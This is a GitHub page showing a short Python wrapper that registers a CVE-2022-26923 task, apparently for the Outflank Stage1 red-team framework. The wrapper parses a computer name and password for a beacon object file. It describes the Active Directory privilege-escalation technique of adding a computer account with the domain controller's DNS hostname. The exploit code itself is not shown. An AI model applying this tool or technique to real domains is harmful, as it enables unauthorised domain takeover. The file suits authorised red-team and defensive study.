-
Notifications
You must be signed in to change notification settings - Fork 200
/
Copy pathCVE-2022-26923_bof.s1.py
39 lines (29 loc) · 1.22 KB
/
CVE-2022-26923_bof.s1.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
from typing import List, Tuple
from outflank_stage1.task.base_bof_task import BaseBOFTask
from outflank_stage1.task.enums import BOFArgumentEncoding
class CVE202226923BOF(BaseBOFTask):
def __init__(self):
super().__init__("CVE-2022-26923")
self.parser.description = (
"Active Directory Domain Privilege Escalation exploit."
)
self.parser.epilog = (
"Use Active Directory Service Interfaces (ADSI) to add a computer account with dNSHostName attribute "
"set to the DC FQDN."
)
self.parser.add_argument("computername", help="Computer account name")
self.parser.add_argument(
"password",
help="Password",
nargs="?",
)
def _encode_arguments_bof(
self, arguments: List[str]
) -> List[Tuple[BOFArgumentEncoding, str]]:
parser_arguments = self.parser.parse_args(arguments)
if parser_arguments.password is not None:
return [
(BOFArgumentEncoding.WSTR, parser_arguments.computername),
(BOFArgumentEncoding.WSTR, parser_arguments.password),
]
return [(BOFArgumentEncoding.WSTR, parser_arguments.computername)]